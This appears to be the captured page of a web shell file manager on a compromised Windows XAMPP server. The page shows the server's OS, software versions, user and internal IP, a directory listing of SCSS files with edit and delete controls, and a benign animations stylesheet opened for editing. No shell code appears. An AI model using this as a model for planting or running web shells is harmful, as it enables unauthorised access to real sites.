[ SYSTEM ]: Windows NT SWD-ELEARN-11 10.0 build 20348 (Windows Server 2016) AMD64
[ SERVER ]: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9 | PHP: 7.3.9
[ USER ]: Elearn | IP: 10.201.204.156
GEFORCE FILE MANAGER
/
C:
/
xampp
/
htdocs
/
Ajaji
/
media
/
com_media
/
scss
/
components
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 _animations.scss
1,116 B
SET
[ EDIT ]
|
[ DEL ]
📄 _media-breadcrumb.scss
1,252 B
SET
[ EDIT ]
|
[ DEL ]
📄 _media-infobar.scss
1,763 B
SET
[ EDIT ]
|
[ DEL ]
📄 _media-modal.scss
1,537 B
SET
[ EDIT ]
|
[ DEL ]
📄 _media-toolbar.scss
1,598 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: _animations.scss
// Animations // slide-fade .slide-fade-enter-active { transition: all .3s cubic-bezier(.4, 0, .2, 1); } .slide-fade-leave-active { transition: all .2s cubic-bezier(.4, 0, .2, 1); } .slide-fade-enter, .slide-fade-leave-to { opacity: 0; transform: translateY(-10px); } // Infobar .infobar-enter-active { animation: slideOutRight .2s reverse; } .infobar-leave-active { animation: slideOutRight .2s; } html[dir=rtl] .infobar-enter-active { animation: slideOutLeft .2s reverse; } html[dir=rtl] .infobar-leave-active { animation: slideOutLeft .2s; } // Slide out right animation @keyframes slideOutRight { from { transform: translate3d(0, 0, 0); } to { visibility: hidden; transform: translate3d(100%, 0, 0); } } @keyframes slideOutLeft { from { transform: translateX(0); } to { visibility: hidden; transform: translate3d(-100%, 0, 0); } } // Bounce in animation .fade-in-enter-active { animation: fadeIn .2s; } .fade-in-leave-active { animation: fadeIn .2s reverse; } @keyframes fadeIn { from { opacity: 0; } to { opacity: 1; } }